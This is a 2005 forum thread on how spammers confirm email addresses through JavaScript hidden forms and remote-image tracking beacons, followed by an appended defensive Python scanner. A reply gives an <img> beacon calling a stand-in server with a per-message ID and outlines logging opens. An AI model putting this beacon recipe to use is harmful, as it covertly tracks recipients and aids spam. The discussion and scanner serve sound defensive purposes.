-
November 7th, 2005, 05:07 AM
#1
Junior Member
How spammers can confirm your email address without you even responding.
I have found a way for a spammer to confirm an email address is valid without the user even responding to it. Here is how it is done. An email with an html form with hidden values is sent to the unfortunate recipient. A JavaScript is inserted to acquire information such as the screen dimensions, browser and operating version. The email software then puts the email and all the JavaScript information plus the email address into hidden fields. This JavaScript is loaded when the email is opened and the JavaScript function sends the html form back to the spammer. Then on the spammer side, he uses Perl to get statistics such as IP address and UserID. VOILA! THE SPAMMER HAS A CONFIRMED EMAIL ADDRESS AND IMPORTANT DEMOGRAPHIC INFORMATION JUST RIPE FOR EXPLOITATION.
The Moral of the Story::::
DON'T HAVE JAVASCRIPT ENABLED ON YOUR EMAIL!!!!
-
November 7th, 2005, 10:48 AM
#2
I have found a way for a spammer to confirm an email address is valid without the user even responding to it.
It's been used and abused before.. You're not the first one to think of this.
Why use javascript? It's, by default, turned off in today's mail clients..
Something like a remote image will do the trick quite nicely too..
Code:
<img src=http://rogue.server/pic.php?id=123456787>
Generate a new ID for every email sent.. Use a database or something to log ID->email address relation.. Create pic.php to log the ID (and everything else you want) and make it return a GIF/JPG..
Unless of course remote images are turned off in the mail client, the user only has to open/read the email.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
November 7th, 2005, 11:15 AM
#3
Wouldn't the better moral be 'Don't open email from people you don't know'?
-
November 7th, 2005, 11:20 AM
#4
Originally posted here by therenegade
Wouldn't the better moral be 'Don't open email from people you don't know'?
Good point.. But... A lot of viruses/worms come from friends and family.. Sometimes spam too (faked email from: address)..
-
November 7th, 2005, 11:40 AM
#5
Originally posted here by SirDice
But... A lot of viruses/worms come from friends and family.. Sometimes spam too (faked email from: address)..
Which is when we fall back on to the 'Don't open attachments you're not really sure of' rule.. admittedly, this fails in lieu of the average home user... as does enforcing a strict security policy (I don't think I've seen too many who surf from non-admin accounts... actually, I think a lot of them don't even know that there're other types of accounts... or that they're on an admin account).. unfortunately it's what's happening in a lot of homes all over today.. which is why we go back to 'Get an AV and keep it updated.'
-
November 7th, 2005, 06:08 PM
#6
The average home user is also the reason why remote images and javascript are turned off by default
-
November 7th, 2005, 06:16 PM
#7
The best way to view all e-mails, in my experience, is in a text only mode. All of the mail clients I use convert html messages to text only messages, and then they give you the option to view the html version if you want.
"Do you know why the system is slow?" they ask
"It's probably something to do with..." I look up today's excuse ".. clock speed"
-BOFH
-
November 7th, 2005, 06:34 PM
#8
True SirDice... but the average user ever so often has the tendency to try and enable it for perceived 'added functionality' (read as chat, pr0n, whatever)
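An added example, not part of the thread or any poster's code: a defender-side check that flags what the posts above describe (script, a form that posts back, a remote image with a per-message ID) and produces the text-only view recommended in post #7. The names `OpenTrackingScanner`, `scan_message` and the `collect.pl` path are assumptions made for illustration.

```python
from email import message_from_string
from email.policy import default
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tag -> attribute a client fetches as soon as the message is rendered.
FETCH_ATTRS = {"img": "src", "iframe": "src", "embed": "src", "link": "href"}

class OpenTrackingScanner(HTMLParser):
    """Collects markup that can report a message open, plus the visible text."""
    def __init__(self):
        super().__init__()
        self.findings, self.text, self._skip = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: v or "" for k, v in attrs}
        self._skip = tag in ("script", "style")  # their contents are not text
        if tag == "script":
            self.findings.append(("script", a.get("src") or "inline"))
        elif tag == "form":
            self.findings.append(("form", a.get("action", "")))
        url = a.get(FETCH_ATTRS.get(tag, ""), "")
        parts = urlsplit(url)
        if parts.netloc:  # cid: and data: URLs name no remote host
            # Any remote fetch reveals the open; a query string often carries the ID.
            kind = "beacon-candidate" if parts.query else "remote-fetch"
            self.findings.append((kind, url))

    def handle_endtag(self, tag):
        self._skip = False

    def handle_data(self, data):
        if not self._skip and data.strip():
            self.text.append(data.strip())

def scan_message(raw):
    """Return (findings, text_only_body) over the text/html parts of a raw mail."""
    scanner = OpenTrackingScanner()
    for part in message_from_string(raw, policy=default).walk():
        if part.get_content_type() == "text/html":
            scanner.feed(part.get_content())
    scanner.close()
    return scanner.findings, " ".join(scanner.text)

# Constructed sample: the <img> is the one quoted in post #2, the rest is made up.
SAMPLE = (
    "Content-Type: text/html; charset=utf-8\n\n"
    "<p>Great offer inside</p><img src=http://rogue.server/pic.php?id=123456787>\n"
    '<form action="http://rogue.server/collect.pl"></form><script>/* made up */</script>\n'
)
```

A mail gateway or client plug-in could show the second return value as the message body and hold back the HTML part whenever the findings list is not empty.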